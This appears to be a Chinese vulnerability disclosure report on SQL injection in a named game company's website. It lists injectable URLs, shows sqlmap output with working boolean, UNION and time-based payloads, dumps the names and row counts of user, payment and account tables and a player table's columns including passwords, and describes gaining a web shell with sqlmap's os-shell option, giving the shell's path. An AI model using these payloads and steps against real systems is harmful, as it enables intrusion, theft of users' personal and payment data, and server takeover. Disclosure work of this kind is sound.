海牛游戏官网http://www.u591.com/ 他的所有子目录都是他旗下的游戏 【首先是SQL注入】 和通用一样,举出几个例子 http://www.u591.com/sw/news.php?id=1634 http://www.u591.com/lw/news_list.php?TypeID=41 http://www.u591.com/tw/news_list.php?ntype=6 http://www.u591.com/newpay/index.php?game_id=2 【sqlmap截图】:
【| u_player1 | 476085 是用户数据库】可以看出有50w用户量,所有游戏加起来,至少几百万用户量 数据库信息
Database: u591 +---------------------+--------- | Table | Entries +---------------------+--------- | u_code_exchange | 3918025 | pay_log | 923359 | u_emoney1 | 889739 | u_player1 | 476085 | cpa | 330352 | u_delplayer1 | 241678 | u_delplayer13 | 234778 | u_delplayer8 | 204292 | u_delplayer16 | 102360 | account | 70736 | emoney1 | 65844 | u_emoney5 | 43306 | u_delplayer302 | 31632 | u_delplayer18 | 31613 | pay_sms | 23660 | u_emoney4 | 20247 | u_emoney2 | 17496 | u_emoney3 | 16719 | fenbaouser | 15749 | u_itemtype | 13137 | u_delplayer305 | 12886 | u_delplayer301 | 11044 | code_account | 11000 | u_delplayer19 | 8097 | lw_u_player1 | 6027 | code_log | 4114 | u_code_exchange_bak | 4056 | account_limit_log | 3640 | u_delplayer306 | 3376 | lw_u_delplayer1 | 3083 | news_data | 1545 | add_good | 887 | u_charts_player | 709 | u_card | 532 | lw_add_good | 244 | kf_message | 236 | key_value | 113 | pay_91 | 109 | kf_reply | 95 | news_class | 70 | client_data | 67 | account_ip_error | 56 | lw_u_vipgoods | 49 | change_pay_log | 33 | down_class | 24 | user_fenbao | 17 | link_data | 14 | admin_user | 8 | online_4399 | 6 | client_ver | 4 | idfa_app | 3 | publicity | 3 | artificial_vip | 2 | bug_message | 2 | sent_message | 2 | u_code_businesses | 2 | app_sent | 1 +---------------------+---------
Database: u591 Table: u_player1 [93 columns] +-------------------+------------------------------- | Column | Type +-------------------+------------------------------- | level | tinyint(1) unsigned | position | tinyint(3) unsigned | account | varchar(7) | account_id | int(4) unsigned | additional_point | smallint(2) unsigned | attr | int(4) unsigned zerofill | auto_exercise | tinyint(4) unsigned zerofill | auto_point | tinyint(1) unsigned | bfcrystal1 | int(4) unsigned | bfcrystal2 | int(4) unsigned | bfcrystal3 | int(4) unsigned | big_badluck | tinyint(1) unsigned | card_id | int(4) unsigned | chk_sum | int(4) unsigned | clan_proffer | int(4) unsigned | coin_money | int(4) unsigned | crystal_usage | int(4) unsigned | current_life_max | int(4) unsigned | dark_rate | tinyint(1) | data_num | tinyint(1) unsigned zerofill | Defense_point | smallint(2) unsigned | dexiterity | smallint(2) unsigned | dodge | smallint(2) unsigned | earth_element | smallint(2) unsigned zerofill | emoney | int(4) unsigned | eud_bag_size | tinyint(1) unsigned | eud_storage_limit | tinyint(1) unsigned | exp | int(4) unsigned | exp_ball_usage | smallint(2) unsigned | ext_package_size | tinyint(1) unsigned | extra_point | int(4) unsigned | fire_element | smallint(2) unsigned zerofill | fire_rate | tinyint(1) | flower | int(4) unsigned | geomancy | int(4) unsigned | god_status | int(4) unsigned | godexp | int(4) unsigned zerofill | gold_element | smallint(2) unsigned zerofill | governproffer | smallint(2) unsigned | grid_amount | smallint(2) unsigned | grid_lev | smallint(2) unsigned | hair | smallint(2) unsigned | health | smallint(2) unsigned | holy_rate | tinyint(1) | horse_bag_size | tinyint(1) unsigned | ice_rate | tinyint(1) | id | int(4) unsigned | impart_num | int(4) unsigned | intellect_point | smallint(2) unsigned | last_login | int(8) unsigned | last_logout | int(4) unsigned zerofill | life | int(4) unsigned | Life_point | smallint(2) unsigned | lock_key | int(10) unsigned | lookface | int(4) unsigned | magic_atk | int(4) unsigned | mana | smallint(2) unsigned | marry_id | int(4) unsigned zerofill | money | int(4) unsigned | money_saved | int(4) unsigned | mora | int(4) unsigned zerofill | name | varchar(7) | num_kill_small | int(4) unsigned | old_prof | smallint(2) unsigned | online_time | tinyint(4) unsigned zerofill | password | varchar(7) | pk | int(4) | popularity | int(4) unsigned | profession | tinyint(2) unsigned | reborn_times | tinyint(1) unsigned | recordmap_id | int(4) unsigned | recordx | smallint(2) unsigned | recordy | smallint(2) unsigned | reserve_money | int(4) unsigned | small_badluck | tinyint(1) unsigned | soul | smallint(2) unsigned | sp | smallint(2) unsigned | Speed_point | smallint(2) unsigned | stamina | smallint(2) unsigned | storage_lev | tinyint(1) unsigned zerofill | strength | smallint(2) unsigned | strength_point | smallint(2) unsigned | student_finished | int(4) unsigned | syndicate_id | int(4) unsigned | task_mask | int(4) unsigned zerofill | thunder_rate | tinyint(1) | title | int(4) unsigned | vigor | smallint(2) unsigned | vitality | smallint(2) unsigned | water_element | smallint(2) unsigned zerofill | wind_rate | tinyint(1) | wood_element | smallint(2) unsigned zerofill | workload | smallint(2) unsigned +-------------------+-------------------------------
【GETSHELL来了】 因为是DBA权限:
通过SQL注入报错信息得知网站根目录 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wamp\www\www\inc\function.php on line 208 利用sqlmap的--os-shell 直接getshell
SHELL地址:http://www.u591.com:80/inc/tmpulkll.php 因为注入通用,所以getshell通用,因为游戏都在二级目录下,所以直接拿到官网shell
sqlmap全过程
[11:58:51] [INFO] testing connection to the target URL [11:58:52] [INFO] testing if the target URL is stable. This can take a couple of seconds [11:58:53] [INFO] target URL is stable [11:58:53] [INFO] testing if GET parameter 'id' is dynamic [11:58:53] [INFO] confirming that GET parameter 'id' is dynamic [11:58:53] [INFO] GET parameter 'id' is dynamic [11:58:53] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [11:58:54] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] do you want to include all tests for 'MySQL' extending provided level (1) and ri sk (1) values? [Y/n] [11:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [11:58:58] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHER E or HAVING clause' injectable [11:58:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)' [11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)' [11:58:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [11:58:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause ' [11:58:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [11:58:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)' [11:59:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)' [11:59:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [11:59:00] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [11:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [11:59:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [11:59:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' [11:59:01] [INFO] testing 'MySQL inline queries' [11:59:01] [INFO] testing 'MySQL > 5.0.11 stacked queries' [11:59:01] [WARNING] time-based comparison requires larger statistical model, pl ease wait... [11:59:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [11:59:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [11:59:13] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable [11:59:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [11:59:13] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [11:59:13] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t he range for current UNION query injection technique test [11:59:14] [INFO] target URL appears to have 7 columns in query [11:59:15] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu mns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] sqlmap identified the following injection points with a total of 41 HTTP(s) requ ests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1634 AND 1530=1530 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=1634 UNION ALL SELECT NULL,NULL,CONCAT(0x716b7a6271,0x704f4a5056 4871726d50,0x7178787071),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1634 AND SLEEP(5) --- [11:59:39] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.2.6, Apache 2.2.8 back-end DBMS: MySQL 5.0.11